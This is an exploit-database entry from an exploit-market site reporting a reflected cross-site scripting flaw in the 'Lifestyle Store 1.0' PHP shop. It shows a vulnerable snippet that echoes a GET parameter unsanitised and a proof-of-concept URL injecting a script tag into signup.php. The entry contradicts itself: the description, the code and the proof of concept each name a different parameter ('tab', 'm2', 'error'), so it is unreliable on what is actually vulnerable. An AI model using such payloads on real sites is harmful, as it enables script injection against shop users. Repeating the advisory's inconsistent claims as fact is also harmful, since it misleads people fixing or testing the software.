[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Lifestyle Store 1.0 Cross Site Scripting Vulnerability

Author
thamer
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-36906
Category
web applications
Date add
13-10-2021
Platform
php
Lifestyle Store 1.0 Cross Site Scripting

# Exploit Title:  Lifestyle Store  (Online Shop Store) 1.0 - Reflected Cross-Site Scripting (XSS)
# Author: Thamer https://twitter.com/thamer9900
# Software Link: https://download-media.code-projects.org/2021/07/Online_Shop_Store_In_PHP_With_Source_Code.zip
# Version: 1.0.0
# Tested on: Windows 10


1. Description:
The tab parameter in the signup.php is vulnerable to XSS.


2. signup.php in line 62 code:

 if(isset($_GET["m2"])){
      echo $_GET['m2'];
    }

3. Proof of Concept:
/online-shop/signup.php?error=<script>print()</script>

#  0day.today [2024-11-16]  #